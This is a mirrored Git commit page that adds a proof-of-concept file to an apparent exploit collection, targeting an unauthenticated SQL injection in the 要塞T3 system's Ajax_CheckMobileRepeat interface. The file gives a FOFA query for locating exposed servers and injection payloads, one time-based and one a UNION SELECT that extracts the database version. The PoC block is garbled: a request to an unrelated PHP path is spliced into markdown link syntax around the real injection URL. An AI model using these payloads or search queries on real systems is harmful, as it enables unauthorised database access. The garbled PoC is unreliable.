mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-06-20 09:51:11 +00:00
Create 要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞.md
This commit is contained in:
parent
2a15a060bc
commit
99613ff055
17
wpoc/要塞T3管理系统/要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞.md
Normal file
17
wpoc/要塞T3管理系统/要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞.md
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
# 要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞
|
||||||
|
|
||||||
|
要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句。
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
body="/mlogin.htm?url=" || body="T3/MAIN/Login.aspx"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
[GET /config/rellistname.php?DontCheckLogin=1&objType=1&reportID=1+wAiTFOR+DeLAy'0:0:4'--+- HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Cookie: PHPSESSID=bgsesstimeout-;](http://ip/T3/Ajax/Ajax_CheckMobileRepeat.ashx?action=checkmobilerepeat&mobileNum=1%27%20UNION%20ALL%20SELECT%20NULL%2C%28SELECT%20%40%40version%29--%20aEdt)
|
||||||
|
```
|
Loading…
x
Reference in New Issue
Block a user